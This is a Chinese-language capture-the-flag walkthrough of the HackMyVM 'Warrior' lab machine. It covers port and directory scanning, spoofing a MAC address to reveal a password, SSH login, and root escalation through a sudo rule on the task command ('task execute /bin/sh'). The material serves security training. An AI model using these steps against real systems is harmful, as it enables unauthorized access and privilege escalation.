[HMV] Warrior

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.177

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.59
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:56 CST
Nmap scan report for 172.16.1.59
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 25168d636b75f05955d4b02d758de0e6 (RSA)
|   256 1e29d0f4c595e740302b35f7a3bc3675 (ECDSA)
|_  256 ccb152b3d7efcd734cfcf6b55177eaf3 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-robots.txt: 7 disallowed entries 
| /admin /secret.txt /uploads/id_rsa /internal.php 
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:3D:32:60 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds

发现了 22 (SSH) 和 80 (HTTP) 端口，直接看 Web

网页上什么也没有，扫描一下后台

┌──(root㉿Kali-VM)-[~]
└─# dirsearch -u http://172.16.1.59/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/172.16.1.59/-_23-03-23_08-57-10.txt

Error Log: /root/.dirsearch/logs/errors-23-03-23_08-57-10.log

Target: http://172.16.1.59/

[08:57:10] Starting: 
[08:57:15] 301 -  169B  - /admin  ->  http://172.16.1.59/admin/             
[08:57:15] 403 -  555B  - /admin/                                           
[08:57:15] 403 -  555B  - /admin/?/login
[08:57:23] 200 -   31B  - /index.html                                       
[08:57:30] 200 -  137B  - /robots.txt                                       
[08:57:33] 200 -    5B  - /user.txt                                         
                                                                             
Task Completed

发现了几个路径，先看 robots.txt

Disallow:/admin
Disallow:/secret.txt
Disallow:/uploads/id_rsa
Disallow:/internal.php
Disallow:/internal
Disallow:/cms
Disallow:/user.txt

robots.txt 包含了之前扫到的几个路径，看看路径分别对应什么

/admin -> 403
/secret.txt -> 0123456789ABCDEF
/uploads/id_rsa -> 404
/internal.php -> Hey bro, you need to have an internal MAC as 00:00:00:00:00:a? to read your pass..
/internal -> 404
/cms -> 404
/user.txt -> loco

/internal.php 提示我们要修改内部 MAC 地址为 00:00:00:00:00:a? 才能看到密码，这里需要修改 Kali 的 MAC 地址，最后发现 AF 是正确的地址

┌──(root㉿Kali-VM)-[~]
└─# curl http://172.16.1.177/internal.php
<br>Good!!!!!<!-- Your password is: Zurviv0r1 -->

获得了密码。尝试登陆 loco 用户失败，登录 bro 用户成功

[C:\~]$ ssh bro@172.16.1.177


Connecting to 172.16.1.177:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux warrior 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb  8 04:03:20 2022 from 192.168.1.51

bro@warrior:~$ id
uid=1000(bro) gid=1000(bro) groups=1000(bro),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

bro@warrior:~$ whoami
bro

获得 user flag

bro@warrior:~$ ls -al ~
total 32
drwxr-xr-x 3 bro  bro  4096 Mar 22 21:17 .
drwxr-xr-x 3 root root 4096 Feb  8  2022 ..
-rw-r--r-- 1 bro  bro   220 Feb  8  2022 .bash_logout
-rw-r--r-- 1 bro  bro  3526 Feb  8  2022 .bashrc
drwxr-xr-x 3 bro  bro  4096 Feb  8  2022 .local
-rw-r--r-- 1 bro  bro   807 Feb  8  2022 .profile
-rw------- 1 bro  bro    21 Feb  8  2022 user.txt
-rw------- 1 bro  bro    53 Mar 22 21:17 .Xauthority

bro@warrior:~$ cat ~/user.txt 
LcHHbXGHMVhCpQHvqDen

查看所有可以进入终端的用户

bro@warrior:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
bro:x:1000:1000:bro,,,:/home/bro:/bin/bash

发现只有 bro 和 root，看来需要直接提权到 root。检查具有 SUID 权限的命令

bro@warrior:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/sudo
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

发现了 /usr/sbin/sudo，查看可以运行的 sudo 命令

bro@warrior:~$ /usr/sbin/sudo -l
Matching Defaults entries for bro on warrior:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bro may run the following commands on warrior:
    (root) NOPASSWD: /usr/bin/task

查阅 GTFObins 发现 task 命令可以用于提权

bro@warrior:~$ /usr/sbin/sudo /usr/bin/task execute /bin/sh

# su

root@warrior:/home/bro# ls -al
total 32
drwxr-xr-x 3 bro  bro  4096 Mar 22 21:17 .
drwxr-xr-x 3 root root 4096 Feb  8  2022 ..
-rw-r--r-- 1 bro  bro   220 Feb  8  2022 .bash_logout
-rw-r--r-- 1 bro  bro  3526 Feb  8  2022 .bashrc
drwxr-xr-x 3 bro  bro  4096 Feb  8  2022 .local
-rw-r--r-- 1 bro  bro   807 Feb  8  2022 .profile
-rw------- 1 bro  bro    21 Feb  8  2022 user.txt
-rw------- 1 bro  bro    53 Mar 22 21:17 .Xauthority

root@warrior:/home/bro# cd

root@warrior:~# cat root.txt 
HPiGHMVcDNLlXbHLydMv

0x02 总结

改 MAC 地址略微麻烦